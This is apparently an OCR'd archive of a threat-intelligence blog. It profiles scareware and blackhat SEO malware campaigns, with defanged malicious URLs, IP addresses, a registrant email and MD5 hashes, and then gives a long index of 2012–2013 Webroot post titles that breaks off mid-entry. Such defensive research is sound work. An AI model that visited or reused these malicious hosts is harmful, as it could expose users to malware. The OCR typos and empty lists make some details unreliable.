We've recently come across a currently active diversified portfolio of pharmaceutical scams, with the cybercriminals behind it successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts, including the active utilization of an affiliate-network based type of revenue sharing scheme. 

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it. 

We'll continue monitoring the campaign and post updates as soon as new developments take place. 
Historical OSINT - Massive Black Hat SEO Campaign Spotted in the Wild (2017-05-29 19:28) 

Cybercriminals continue actively launching fraudulent and malicious blackhat SEO campaigns, further acquiring legitimate traffic for the purpose of converting it into malware-infected hosts, further spreading malicious software potentially compromising the confidentiality, availability and integrity of the targeted host to a multitude of malicious software. 

We've recently intercepted a currently active malicious blackhat SEO campaign serving scareware to socially engineered users, with the cybercriminals behind it earning fraudulent revenue largely relying on the utilization of an affiliate-network based revenue-sharing scheme. 

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. 

Malicious domains known to have participated in the campaign: 

hxxp://doremisan7.net?uid=213&pid=3&ttl=319455a3f86 - 67.215.238.189 

Malicious redirector known to have participated in the campaign: 

hxxp://marketcoms.cn/?pid=123&sid=8ec7ca&uid=213&isRedirected=1 - 91.205.40.5 - Email: JeremyL-Rademacher(g)|ive.com 

Related malicious domains known to have been 
parked within the same malicious IP (91.205.40.5): 


Malicious domains known to have participated in the campaign: 

hxxp://guard-syszone.net/?p=WKmimHVmaWyHjsblo22EeXZeOKCfZlbVoKDb2YmHWJjOxaCbkXI%2Bal6orKWeYJWfZWVilWWenGOIo6THodjXoGJdpqmikpVuaGVvZGlkbV%2FEkKE%3D - 206.53.61.73 

hxxp://yourspywarescanl5.com/scanl/?pid=123&engine=pXT3wjTuNjYzLjE3Ny4xNTMmdGltZT0xMjUxMYkNPAFO - 85.12.24.12 

Sample detection rates for sample malware: 

MD5: 3d448b584d52c6a6a45ff369d839eb06 

MD5: 54f671bb9283bf4dfdf3c891fd9cd700 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
Historical OSINT - Mac OS X PornTube Malware Serving Domains (2017-05-29 20:05) 

Cybercriminals continue to actively launch malicious and fraudulent malware-serving campaigns, further spreading malicious software potentially compromising the confidentiality, availability and integrity of the targeted host to a multitude of malicious software, while earning fraudulent revenue in the process of monetizing access to malware-infected hosts. 

We've recently intercepted a currently active portfolio of rogue/fake PornTube malicious and fraudulent domains, with the cybercriminals behind the campaign earning fraudulent revenue largely relying on the utilization of an affiliate-network based revenue-sharing scheme. 

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. 

Known to have been parked within the same malicious IP (93.190.140.56) are also the following malicious domains: 


We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
Cyber Conspiracy 
Who OtaHiS Them All 

By Dancho Danchev 

The adventurous and fanciful life of a Bulgarian hacker in the 90's caught between the musings of the security industry and the Intelligence Community pursuing his own personal goals leading to a blissful career as a renewed security expert for an international foundation 


Book Proposal - Seeking Sponsorship - Publisher 
Contact (2017-11-15 14:23) 

Dear blog readers, as I'm currently busy writing a book, I'm currently seeking a publisher contact, with the book proposal available on request. 

Approach me at ddanchev(g)cryptogroup.net 
Historical OSINT - Summarizing 2 Years of Webroot's Threat Blog Posts Research (2018-07-28 21:00) 

It's been several years since I last posted a quality update at the industry's leading threat-intelligence gathering [1]Webroot's Threat Blog, following a successful career as lead security blogger and threat-intelligence analyst throughout 2012-2014. 

In this post I'll summarize two years' worth of Webroot's Threat Blog research with the idea to provide readers with the necessary data, information and knowledge to stay ahead of current and emerging threats. 

01. January - 2012 

• [2]Cybercriminals generate malicious Java applets using DIY tools 

• [3]A peek inside the uBot malware bot 

• [4]Researchers intercept a client-side exploits serving malware campaign 

• [5]How phishers launch phishing attacks 

• [6]A peek inside the Umbra malware loader 

• [7]How malware authors evade antivirus detection 

• [8]Inside AnonJDB - a Java based malware distribution platform for drive-by downloads 

• [9]Zappos.com hacked, 24 million users affected 

• [10]Inside a clickjacking/likejacking scam distribution platform for Facebook 

• [11]A peek inside the Cythosia v2 DDoS Bot 

• [12]A peek inside the PickPocket Botnet 

• [13]Mass SQL injection attack affects over 200,000 URLs 

• [14]Email hacking for hire going mainstream 

• [15]Millions of harvested emails offered for sale 

02. February - 2012 

• [16]Research: Google's reCAPTCHA under fire 

• [17]Spamvertised 'You have 1 lost message on Facebook' 
campaign leads to pharmaceutical scams 

• [18]A peek inside the Smoke Malware Loader 

• [19]Researchers spot Citadel, a ZeuS crimeware variant 

• [20]Researchers intercept two client-side exploits serving 
malware campaigns 

• [21]Pharmaceutical scammers launch their own Web 
contest 

• [22]The United Nations hacked, Team Poison claims 
responsibility 

• [23]Report: Internet Explorer 9 leads in socially-engineered 
malware protection 

• [24]Twitter adds HTTPS support by default 

• [25]Spamvertised "Hallmark ecard" campaign leads to 
malware 

• [26]Report: 3,325 % increase in malware targeting the 
Android OS 

• [27]Why relying on antivirus signatures is simply not 
enough anymore 

• [28]Researchers intercept malvertising campaign using 
Yahoo's ad network 

• [29]A peek inside the Ann Malware Loader 

• [30]Spamvertised 'Termination of your CPA license' campaign serving client-side exploits 

• [31]How cybercriminals monetize malware-infected hosts 

• [32]A peek inside the Elite Malware Loader 

• [33]BlackHole exploit kit gets updated with new features 

03. March - 2012 

• [34]New service converts malware-infected hosts into anonymization proxies 

• [35]Spamvertised 'Temporary Limit Access To Your Account' emails lead to Citi phishing emails 

• [36]A peek inside the Darkness (Optima) DDoS Bot 

• [37]Research: proper screening could have prevented 67 % 
of abusive domain registrations 

• [38]Spamvertised 'Your accountant license can be revoked' 
emails lead to client-side exploits and malware 

• [39]Spamvertised 'Google Pharmacy' themed emails lead 
to pharmaceutical scams 

• [40]Research: U.S accounts for 72 % of fraudulent 
pharmaceutical orders 

• [41]Millions of harvested U.S government and U.S military 
email addresses offered for sale 

• [42]Trojan Downloaders actively utilizing Dropbox for 
malware distribution 
• [43]Spamvertised 'Your tax return appeal is declined' emails serving client-side exploits and malware 

• [44]Malicious USPS-themed emails circulating in the wild 

• [45]Spamvertised Linkedin notifications serving client-side 
exploits and malware 

• [46]Tens of thousands of web sites affected in ongoing 
mass SQL injection attack 

• [47]Spamvertised Verizon-themed 'Your Bill Is Now 
Available' emails lead to ZeuS crimeware 

• [48]Spamvertised 'Scan from a Hewlett-Packard ScanJet' 
emails lead to client-side exploits and malware 

04. April - 2012 

• [49]Email hacking for hire going mainstream - part two 

• [50]Spamvertised 'US Airways' themed emails serving 
client-side exploits and malware 

• [51]New underground service offers access to hundreds of 
hacked PCs 

• [52]New DIY email harvester released in the wild 

05. May - 2012 

• [53]Managed SMS spamming services going mainstream 

• [54]A peek inside a boutique cybercrime-friendly E-shop 

• [55]Cybercriminals release 'Sweet Orange' - new web 
malware exploitation kit 



• [56]Spamvertised 'Pizzeria Order Details' themed 
campaign serving client-side exploits and malware 

• [57]Poison Ivy trojan spreading across Skype 

• [58]A peek inside a managed spam service 

• [59]Ongoing 'Linkedin Invitation' themed campaign 
serving client-side exploits and malware 

• [60]Spamvertised bogus online casino themed emails 
serving adware 

• [61]Spamvertised 'YouTube Video Approved' and 'Twitter Support' themed emails lead to pharmaceutical scams 

• [62]A peek inside a boutique cybercrime-friendly E-shop - 
part two 

• [63]Spamvertised CareerBuilder themed emails serving 
client-side exploits and malware 

• [64]Pop-ups at popular torrent trackers serving 
W32/Casonline adware 

• [65]'Windstream bill' themed emails serving client-side 
exploits and malware 

06. June - 2012 

• [66]Cybercriminals infiltrate the music industry by offering 
full newly released albums for just $1 
• [67]A peek inside a boutique cybercrime-friendly E-shop - part three 

• [68]DDoS for hire services offering to 'take down your 
competitor's web sites' going mainstream 

• [69]Skype propagating Trojan targets Syrian activists 

• [70]Spamvertised 'UPS Delivery Notification' emails 
serving client-side exploits and malware 

• [71]Spamvertised 'DHL Package delivery report' emails 
serving malware 

• [72]Spamvertised 'Your Amazon.com order confirmation' emails serving client-side exploits and malware 

• [73]Cybercriminals populate Scribd with bogus adult content, spread malware using Comodo Backup 

• [74]Spamvertised 'Your Paypal Ebay.com payment' emails serving client-side exploits and malware 

• [75]'Create a Cartoon of You' ads serving MyWebSearch toolbar 

• [76]Spamvertised 'Your UPS delivery tracking' emails serving client-side exploits and malware 

• [77]Spamvertised 'Confirm PayPal account' notifications lead to phishing sites 

• [78]Spamvertised 'DHL Express Parcel Tracking 
Notification' emails serving malware 

• [79]Spamvertised bogus online casino themed emails serving W32/Casonline 

07. July - 2012 

• [80]Cybercriminals launch managed SMS flooding services 

• [81]117,000 unique U.S visitors offered for malware 
conversion 

• [82]Phishing campaign targeting Gmail, Yahoo, AOL and 
Hotmail spotted in the wild 

• [83]What's the underground market's going rate for a 
thousand U.S based malware infected hosts? 

• [84]Spamvertised American Airlines themed emails lead to 
Black Hole exploit kit 

• [85]Online dating scam campaign currently circulating in 
the wild 

• [86]New Russian service sells access to compromised social 
networking accounts 

• [87]Cybercriminals impersonate UPS in client-side exploits 
and malware serving spam campaign 

• [88]Russian Ask.fm spamming tool spotted in the wild 

• [89]Spamvertised Intuit themed emails lead to Black Hole 
exploit kit 

• [90]Cybercriminals impersonate Booking.com, serve malware using bogus 'Hotel Reservation Confirmation' themed emails 

• [91]Spamvertised Craigslist themed emails lead to Black Hole exploit kit 

• [92]Cybercriminals impersonate law enforcement, spamvertise malware-serving 'Speeding Ticket' themed emails 

• [93]Spamvertised 'Download your USPS Label' themed emails serve malware 

• [94]Cybercriminals target Twitter, spread thousands of exploits and malware serving tweets 
exploits and malware serving tweets 

• [95]Russian spammers release Skype spamming tool 

• [96]Spamvertised 'Your Ebay funds are cleared' themed 
emails lead to Black Hole exploit kit 

08. August - 2012 

• [97]Spamvertised AICPA themed emails lead to Black Hole exploit kit 

• [98]Spamvertised 'PayPal has sent you a bank transfer' 
themed emails lead to Black Hole exploit kit 

• [99]Ongoing spam campaign impersonates Linkedin, 
serves exploits and malware 

• [100]Millions of spamvertised emails lead to 
W32/Casonline 

• [101]Cybercriminals impersonate AT&T's Billing Service, serve exploits and malware 

• [102]IRS themed spam campaign leads to Black Hole 
exploit kit 



• [103]Cybercriminals spamvertise bogus greeting cards, 
serve exploits and malware 

• [104]Spamvertised 'Federal Tax Payment Rejected' themed 
emails lead to Black Hole exploit kit 

• [105]Spamvertised 'Fwd: Scan from a Hewlett-Packard 
ScanJet' emails lead to Black Hole exploit kit 

• [106]Spamvertised 'Royal Mail Shipping Advisory' themed 
emails serve malware 

• [107]Cybercriminals impersonate Intuit Market, mass mail 
millions of exploits and malware serving emails 

• [108]Cybercriminals spamvertise PayPal themed 'Notification of payment received' emails, serve malware 

• [109]Cybercriminals impersonate UPS, serve malware 

09. September - 2012 

• [110]Spamvertised 'Wire Transfer Confirmation' themed emails lead to Black Hole exploit kit 

• [111]Intuit themed 'QuickBooks Update: Urgent' emails lead to Black Hole exploit kit 

• [112]Cybercriminals resume spamvertising bogus greeting cards, serve exploits and malware 

• [113]Cybercriminals abuse Skype's SMS sending feature, 
release DIY SMS flooders 

• [114]New Russian service sells access to thousands of 
automatically registered accounts 



• [115]Spamvertised 'Your Fedex invoice is ready to be paid 
now' themed emails lead to Black Hole Exploit kit 

• [116]New Russian DIY SMS flooder using ICQ's SMS sending 
feature spotted in the wild 

• [117]Spamvertised 'US Airways reservation confirmation' 
themed emails serve exploits and malware 

• [118]Cybercriminals impersonate FDIC, serve client-side 
exploits and malware 

• [119]Managed Ransomware-as-a-Service spotted in the 
wild 
• [120]A peek inside a boutique cybercrime-friendly E-shop - part four 

• [121]New E-shop selling stolen credit cards data spotted in 
the wild 

• [122]From Russia with iPhone selling affiliate networks 

• [123]New Russian DIY DDoS bot spotted in the wild 

10. October - 2012 

• [124]New Russian DIY DDoS bot spotted in the wild 

• [125]Recently launched E-shop sells access to hundreds of 
hacked PayPal accounts 

• [126]New Russian service sells access to compromised 
Steam accounts 



• [127]'Vodafone Europe: Your Account Balance' themed 
emails serve malware 

• [128]Cybercriminals impersonate UPS, serve client-side 
exploits and malware 

• [129]'Your video may have illegal content' themed emails 
serve malware 

• [130]Cybercriminals spamvertise 'Amazon Shipping Confirmation' themed emails, serve client-side exploits and malware 

• [131]American Airlines themed emails lead to the Black 
Hole Exploit Kit 

• [132]Bogus Facebook notifications lead to malware 

• [133]Spamvertised 'KLM E-ticket' themed emails serve 
malware 

• [134]'Intuit Payroll Confirmation inquiry' themed emails lead to the Black Hole exploit kit 

• [135]Malware campaign spreading via Facebook direct 
messages spotted in the wild 

• [136]'Regarding your Friendster password' themed emails 
lead to Black Hole exploit kit 

• [137]Russian cybercriminals release new DIY DDoS 
malware loader 

• [138]PayPal 'Notification of payment received' themed 
emails serve malware 



• [139]Cybercriminals impersonate Delta Airlines, serve 
malware 

• [140]'Your UPS Invoice is Ready' themed emails serve 
malware 

• [141]Bogus Skype 'Password successfully changed' 
notifications lead to malware 

• [142]Cybercriminals impersonate Verizon Wireless, serve 
client-side exploits and malware 

• [143]Spamvertised 'BT Business Direct Order' themed 
emails lead to malware 

• [144]Cybercriminals spamvertise millions of British Airways 
themed e-ticket receipts, serve malware 

• [145]Cybercriminals spamvertise millions of bogus 
Facebook notifications, serve malware 

• [146]Nuclear Exploit Pack goes 2.0 
11. November - 2012 

• [147]BofA 'Online Banking Passcode Reset' themed emails 
serve client-side exploits and malware 

• [148]'ADP Immediate Notification' themed emails lead to 
Black Hole Exploit Kit 

• [149]USPS 'Postal Notification' themed emails lead to 
malware 

• [150]'Fwd: Scan from a Xerox W. Pro' themed emails lead to 
Black Hole Exploit Kit 



• [151]'Your Discover Card Services Blockaded' themed 
emails serve client-side exploits and malware 

• [152]'Payroll Account Molded by Intuit' themed emails lead 
to Black Hole Exploit Kit 

• [153]'American Express Alert: Your Transaction is Aborted' themed emails serve client-side exploits and malware 

• [154]Cybercriminals abuse major U.S SMS gateways, 
release DIY Mail-to-SMS flooders 

• [155]'PayPal Account Modified' themed emails lead to 
Black Hole Exploit Kit 

• [156]Bogus Better Business Bureau themed notifications 
serve client-side exploits and malware 

• [157]Cybercriminals spamvertise bogus eFax Corporate 
delivery messages, serve multiple malware variants 

• [158]Bogus IRS 'Your tax return appeal is declined' themed 
emails lead to malware 

• [159]'Copies of Missing EPLI Policies' themed emails lead to 
Black Hole Exploit Kit 

• [160]Cybercriminals spamvertise bogus 'Microsoft License 
Orders' serve client-side exploits and malware 

• [161]Cybercriminals resume spamvertising 'Payroll Account Cancelled by Intuit' themed emails, serve client-side exploits and malware 

• [162]Cybercriminals spamvertise millions of FDIC 'Your activity is discontinued' themed emails, serve client-side exploits and malware 

• [163]Cybercriminals release stealthy DIY mass IFrame 
injecting Apache 2 modules 

• [164]Multiple 'Inter-company' invoice themed campaigns 
serve malware and client-side exploits 

• [165]Bogus Facebook 'pending notifications' themed 
emails serve client-side exploits and malware 

• [166]Cybercriminals target U.K users with bogus 'Pay by 
Phone Parking Receipts' serve malware 

• [167]Bogus DHL 'Express Delivery Notifications' serve malware 

• [168]Cybercriminals impersonate Vodafone U.K, spread 
malicious MMS notifications 

• [169]Cybercriminals impersonate T-Mobile U.K, serve 
malware 

• [170]Bogus 'Meeting Reminder' themed emails serve malware 

• [171]Bogus 'Intuit Software Order Confirmations' lead to Black Hole Exploit Kit 

• [172]Bogus 'End of August Invoices' themed emails serve malware and client-side exploits 

12. December - 2012 

• [173]DIY malicious domain name registering service spotted in the wild 

• [174]Fake 'FedEx Tracking Number' themed emails lead to 
malware 

• [175]Bogus'Facebook Account Cancellation Request' 
themed emails serve client-side exploits and malware 

• [176]Malicious 'Security Update for Banking Accounts' 
emails lead to Black Flole Exploit Kit 

• [177]A peek inside a boutique cybercrime-friendly E-shop - 
part five 

• [178]Fake 'Flight Reservation Confirmations' themed 
emails lead to Black Hole Exploit Kit 

• [179]Malicious 'Sendspace File Delivery Notifications' lead 
to Black Hole Exploit Kit 

• [180]Fake Chase 'Merchant Billing Statement' themed 
emails lead to malware 

• [181]Cybercriminals entice potential cybercriminals into 
purchasing bogus credit cards data 

• [182]Fake 'Change Facebook Color Theme' events lead to 
rogue Chrome extensions 

• [183]Fake 'Citi Account Alert' themed emails lead to Black 
Hole Exploit Kit 

• [184]Spamvertised 'Work at Home' scams impersonating 
CNBC spotted in the wild 

• [185]Pharmaceutical scammers spamvertise YouTube 
themed emails, entice users into purchasing counterfeit 
drugs 


• [186]Cybercriminals resume spamvertising British Airways 
themed E-ticket receipts, serve malware 

• [187]Fake 'UPS Delivery Confirmation Failed' themed 
emails lead to Black Hole Exploit Kit 

12. January - 2013 

• [188]Spamvertised 'Your Recent eBill from Verizon Wireless' 
themed emails serve client-side exploits and malware 

• [189]Fake BBB (Better Business Bureau) Notifications lead 
to Black Hole Exploit Kit 

• [190]'Attention! Changes in the bank reports!' themed 
emails lead to Black Hole Exploit Kit 

• [191]Fake 'You have made an Ebay purchase' themed 
emails lead to client-side exploits and malware 

• [192]A peek inside a boutique cybercrime-friendly E-shop - 
part six 

• [193]Black Hole Exploit Kit author's 'vertical market 
integration' fuels growth in malicious Web activity 

• [194]Spamvertised AICPA themed emails serve client-side 
exploits and malware 

• [195]'Please confirm your U.S Airways online registration' 
themed emails lead to Black Hole Exploit Kit 

• [196]Malicious DIY Java applet distribution platforms going 
mainstream 



• [197]Fake 'ADP Speedy Notifications' lead to client-side 
exploits and malware 
• [198]Cybercriminals release automatic CAPTCHA-solving 
bogus Youtube account generating tool 

• [199]'Batch Payment File Declined' EFTPS themed emails 
lead to Black Hole Exploit Kit 

• [200]Cybercriminals resume spamvertising fake Vodafone 
'A new picture or video message' themed emails, serve malware 

• [201]Leaked DIY malware generating tool spotted in the 
wild 

• [202]Email hacking for hire going mainstream - part three 

• [203]Android malware spreads through compromised 
legitimate Web sites 

• [204]Fake Intuit 'Direct Deposit Service Informer' themed 
emails lead to Black Hole Exploit Kit 

• [205]Fake Linkedin 'Invitation Notifications' themed emails 
lead to client-side exploits and malware 

• [206]Novice cybercriminals experiment with DIY 
ransomware tools 

• [207]Bogus 'Your Paypal Transaction Confirmation' themed 
emails lead to Black Hole Exploit Kit 

• [208]Fake 'FedEx Online Billing - Invoice Prepared to be 
Paid' themed emails lead to Black Hole Exploit Kit 



• [209]A peek inside a DIY password stealing malware 

• [210]Malicious 'Facebook Account Cancellation Request' 
themed emails serve client-side exploits and malware 

12. February - 2013 

• [211]Fake Booking.com 'Credit Card was not Accepted' 
themed emails lead to malware 

• [212]Fake FedEx 'Tracking ID/Tracking Number/Tracking 
Detail' themed emails lead to malware 

• [213]'Your Kindle e-book Amazon receipt' themed emails 
lead to Black Hole Exploit Kit 

• [214]New DIY HTTP-based botnet tool spotted in the wild 

• [215]Mobile spammers release DIY phone number 
harvesting tool 

• [216]New underground service offers access to thousands 
of malware-infected hosts 

• [217]Targeted 'phone ring flooding' attacks as a service 
going mainstream 

• [218]Fake 'You've blocked/disabled your Facebook account' 
themed emails serve client-side exploits and malware 

• [219]Spamvertised IRS 'Income Tax Refund Turned Down' 
themed emails lead to Black Hole Exploit Kit 

• [220]Malware propagates through localized Facebook Wall 
posts 



• [221]Malicious 'RE: Your Wire Transfer' themed emails serve 
client-side exploits and malware 

• [222]New underground E-shop offers access to hundreds of 
hacked PayPal accounts 

• [223]Fake 'Verizon Wireless Statement' themed emails 
lead to Black Hole Exploit Kit 

• [224]DIY malware cryptor as a Web service spotted in the 
wild 
• [225]Malicious 'Data Processing Service' ACH File ID 
themed emails serve client-side exploits and malware 

• [226]How mobile spammers verify the validity of harvested 
phone numbers 

• [227]How much does it cost to buy 10,000 U.S.-based 
malware-infected hosts? 

13. March - 2013 

• [228]New DIY IRC-based DDoS bot spotted in the wild 

• [229]Cybercriminals release new Java exploits centered 
exploit kit 

• [230]Segmented Russian "spam leads" offered for sale 

• [231]New DIY hacked email account content grabbing tool 
facilitates cyber espionage on a mass scale 

• [232]New DIY unsigned malicious Java applet generating 
tool spotted in the wild 



• [233]Commercial Steam 'information harvester/mass group 
inviter' could lead to targeted fraudulent campaigns 

• [234]Fake BofA CashPro 'Online Digital Certificate' themed 
emails lead to malware 

• [235]Spamvertised BBB 'Your Accreditation Terminated' 
themed emails lead to Black Hole Exploit Kit 

• [236]New ZeuS source code based rootkit available for 
purchase on the underground market 

• [237]Cybercriminals resume spamvertising 'Re: Fwd: Wire 
Transfer' themed emails, serve client-side exploits and malware 

• [238]'ADP Package Delivery Notification' themed emails 
lead to Black Hole Exploit Kit 

• [239]Cybercrime-friendly community branded HTTP/SMTP 
based keylogger spotted in the wild 

• [240]Hacked PCs as 'anonymization stepping-stones' 
service operates in the open since 2004 

• [241]Fake 'CNN Breaking News Alerts' themed emails lead 
to Black Hole Exploit Kit 

• [242]Spotted: cybercriminals working on new Western 
Union based 'money mule management' script 

• [243]Malicious 'BBC Daily Email' Cyprus bailout themed 
emails lead to Black Hole Exploit Kit 

• [244]'ADP Payroll Invoice' themed emails lead to malware 



• [245]'Terminated Wire Transfer Notification/ACH File ID' 
themed malicious campaigns lead to Black Hole Exploit Kit 

• [246]New DIY RDP-based botnet generating tool leaks in 
the wild 

• [247]A peek inside the EgyPack Web malware exploitation 
kit 

14. April - 2013 

• [248]DIY Java-based RAT (Remote Access Tool) spotted in 
the wild 

• [249]Spamvertised 'Re: Changelog as promised' themed 
emails lead to malware 
• [250]Cybercrime-friendly service offers access to tens of 
thousands of compromised accounts 

• [251]Madi/Mahdi/Flashback OS X connected malware 
spreading through Skype 

• [252]Cybercriminals selling valid 'business card' data of 
company executives across multiple verticals 

• [253]A peek inside the 'Zerokit/0kit/ring0 bundle' bootkit 

• [254]DIY Skype ring flooder offered for sale 

• [255]Spamvertised 'Your order for helicopter for the 
weekend' themed emails lead to malware 



• [256]A peek inside a 'life cycle aware' underground market 
ad for a private keylogger 

• [257]American Airlines 'You can download your ticket' 
themed emails lead to malware 

• [258]Cybercriminals offer spam-friendly SMTP servers for 
rent [259] 

• [260]How mobile spammers verify the validity of harvested 
phone numbers - part two 

• [261]A peek inside a (cracked) commercially available RAT 
(Remote Access Tool) 

• [262]DIY Russian mobile number harvesting tool spotted in 
the wild 

• [263]DIY SIP-based TDoS tool/number validity checker 
offered for sale 

• [264]CAPTCHA-solving Russian email account registration 
tool helps facilitate cybercrime 

• [265]Historical OSINT - The 'Boston Marathon explosion' 
and 'Fertilizer plant explosion in Texas' themed malware 
campaigns 

• [266]Fake 'DHL Delivery Report' themed emails lead to 
malware 

• [267]Cybercriminals impersonate Bank of America (BofA), 
serve malware 

• [268]How fraudulent blackhat SEO monetizers apply 
Quality Assurance (QA) to their DIY doorway generators 



• [269]Managed 'Russian ransomware' as a service spotted in 
the wild 

15. May - 2013 

• [270]FedWire 'Your Wire Transfer' themed emails lead to 
malware 

• [271]A peek inside a CVE-2013-0422 exploiting DIY 
malicious Java applet generating tool 

• [272]New IRC/HTTP based DDoS bot wipes out competing 
malware 

• [273]New version of DIY Google Dorks based mass website 
hacking tool spotted in the wild 

• [274]Citibank 'Merchant Billing Statement' themed emails 
lead to malware 

• [275]Fake Amazon 'Your Kindle E-Book Order' themed 
emails circulating in the wild, lead to client-side exploits 
and malware 

• [276]Cybercriminals impersonate New York State's 
Department of Motor Vehicles (DMV), serve malware 

• [277]Cybercriminals offer HTTP-based keylogger for sale, 
accept Bitcoin 
• [278]Newly launched E-shop for hacked PCs charges based 
on malware 'executions' 

• [279]New subscription-based 'stealth Bitcoin miner' 
spotted in the wild 



• [280]Fake 'Free Media Player' distributed via rogue 'Adobe 
Flash Player HD' advertisement 

• [281]New versatile and remote-controlled 
"Android.MouaBot" malware found in the wild 

• [282]Newly launched 'Magic Malware' spam campaign 
relies on bogus 'New MMS' messages 

• [283]Commercial 'form grabbing' rootkit spotted in the wild 

• [284]DIY malware cryptor as a Web service spotted in the 
wild - part two 

• [285]CVs and sensitive info soliciting email campaign 
impersonates NATO 

• [286]New commercially available DIY invisible Bitcoin 
miner spotted in the wild 

• [287]Fake 'Export License/Payment Invoice' themed emails 
lead to malware 

• [288]Compromised Indian government Web site leads to 
Black Hole Exploit Kit 

• [289]Cybercriminals resume spamvertising Citibank 
'Merchant Billing Statement' themed emails, serve malware 

• [290]Marijuana-themed DDoS for hire service spotted in the 
wild 

• [291]Fake 'Vodafone U.K Images' themed malware serving 
spam campaign circulating in the wild 


16. June - 2013 



• [292]Compromised FTP/SSH account privilege-escalating 
mass iFrame embedding platform released on the underground 
marketplace 

• [293]New E-shop sells access to thousands of hacked PCs, 
accepts Bitcoin 

• [294]Pharmaceutical scammers impersonate Facebook's 
Notification System, entice users into purchasing counterfeit 
drugs 

• [295]iLivid ads lead to 'Searchqu Toolbar/Search Suite' PUA 
(Potentially Unwanted Application) 

• [296]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify, 
Skype, Twitter, Instagram, Tumblr, Freelancer accounts 
offered for sale 

• [297]Scammers impersonate the UN Refugee Agency 
(UNHCR), seek your credit card details 

• [298]Fake 'Unsuccessful Fax Transmission' themed emails 
lead to malware 

• [299]Tens of thousands of spamvertised emails lead to 
W32/Casonline 

• [300]Rogue ads lead to SafeMonitorApp Potentially 
Unwanted Application (PUA) 

• [301]How cybercriminals apply Quality Assurance (QA) to 
their malware campaigns before launching them 

• [302]Rogue ads target EU users, expose them to 
Win32/Toolbar.SearchSuite through the KingTranslate PUA 



• [303]New boutique iFrame crypting service spotted in the 
wild 
• [304]Rogue 'Oops Video Player' attempts to visually social 
engineer users, mimics Adobe Flash Player's installation 
process 

• [305]New E-Shop sells access to thousands of malware- 
infected hosts, accepts Bitcoin 

• [306]New subscription-based SHA256/Scrypt supporting 
stealth DIY Bitcoin mining tool spotted in the wild 

• [307]Rogue 'Free Mozilla Firefox Download' ads lead to 
'InstallCore' Potentially Unwanted Application (PUA) 

• [308]SIP-based API-supporting fake caller ID/SMS number 
supporting DIY Russian service spotted in the wild 

• [309]Rogue 'Free Codec Pack' ads lead to Win32/InstallCore 
Potentially Unwanted Application (PUA) 

• [310]Self-propagating ZeuS-based source code/binaries 
offered for sale 

• [311]How cybercriminals create and operate Android-based 
botnets 

17. July - 2013 

• [312]Cybercriminals experiment with Tor-based C&C, ring- 
3-rootkit empowered, SPDY form grabbing malware bot 



• [313]Deceptive ads targeting German users lead to the 
'W32/SomotoBetterInstaller' Potentially Unwanted Application 
(PUA) 

• [314]Newly launched underground market service harvests 
mobile phone numbers on demand 

• [315]Novel ransomware tactic locks users' PCs, demands 
that they participate in a survey to get the unlock code 

• [316]Spamvertised 'Export License/Invoice Copy' themed 
emails lead to malware 

• [317]Cybercriminals spamvertise tens of thousands of fake 
'Your Booking Reservation at Westminster Hotel' themed 
emails, serve malware 

• [318]New commercially available mass FTP-based proxy- 
supporting doorway/malicious script uploading application 
spotted in the wild 

• [319]Fake 'iGO4 Private Car Insurance Policy Amendment 
Certificate' themed emails lead to malware 

• [320]Tens of thousands of spamvertised emails lead to the 
Win32/PrimeCasino PUA (Potentially Unwanted Application) 

• [321]Spamvertised 'Vodafone U.K MMS ID/Fake Sage 50 
Payroll' themed emails lead to (identical) malware 

• [322]New commercially available Web-based 
WordPress/Joomla brute-forcing tool spotted in the wild 



• [323]Rogue ads targeting German users lead to 
Win32/InstallBrain PUA (Potentially Unwanted Application) 

• [324]Yet another commercially available stealth 
Bitcoin/Litecoin mining tool spotted in the wild 

• [325]Protected: Deceptive 'Media Player Update' ads 
expose users to the rogue 'Video Downloader/Bundlore' 
Potentially Unwanted Application (PUA) 

• [326]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 
hosting capabilities 
• [327]Fake 'Copy of Vodafone U.K Contract/Your Monthly 
Vodafone Bill is Ready/New MMS Received' themed 
emails lead to malware 

• [328]Rogue ads lead to the 'Free Player' Win32/Somoto 
Potentially Unwanted Application (PUA) 

• [329]How much does it cost to buy one thousand 
Russian/Eastern European based malware-infected hosts? 

• [330]Custom USB sticks bypassing Windows 7/8's AutoRun 
protection measure going mainstream 

• [331]DIY commercially-available 'automatic Web site 
hacking as a service' spotted in the wild 


18. August - 2013 



• [332]'Malware-infected hosts as stepping stones' service 
offers access to hundreds of compromised U.S based hosts 

• [333]New 'Hacked shells as a service' empowers 
cybercriminals with access to high page rank-ed Web sites 

• [334]Fake 'iPhone Picture Snapshot Message' themed 
emails lead to malware 

• [335]Malicious Bank of America (BofA) 'Statement of 
Expenses' themed emails lead to client-side exploits and 

malware 

• [336]Cybercriminals spamvertise fake 'O2 U.K MMS' 
themed emails, serve malware 

• [337]One-stop-shop for spammers offers DKIM-verified 
SMTP servers, harvested email databases and training 
to potential customers 

• [338]Fake 'Apple Store Gift Card' themed emails serve 
client-side exploits and malware 

• [339]Newly launched managed 'malware dropping' service 
spotted in the wild 

• [340]Cybercrime-friendly underground traffic exchange 
helps facilitate fraudulent and malicious activity 

• [341]From Vietnam with tens of millions of harvested 
emails, spam-ready SMTP servers and DIY spamming tools 



• [342]DIY Craigslist email collecting tools empower 
spammers with access to fresh/valid email addresses 

• [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez 
hosting service operates in the open since 2009 

• [344]DIY automatic cybercrime-friendly 'redirectors 
generating' service spotted in the wild 

• [345]Cybercriminals offer spam-ready SMTP servers for 
rent/direct managed purchase 

• [346]Cybercrime-friendly underground traffic exchanges 
help facilitate fraudulent and malicious activity - part two 

19. September - 2013 

• [347]DIY malicious Android APK generating 'sensitive 
information stealer' spotted in the wild 

• [348]Web-based DNS amplification DDoS attack mode 
supporting PHP script spotted in the wild 

• [349]Managed Malicious Java Applets Hosting Service 
Spotted in the Wild 
• [350]Affiliate network for mobile malware impersonates 
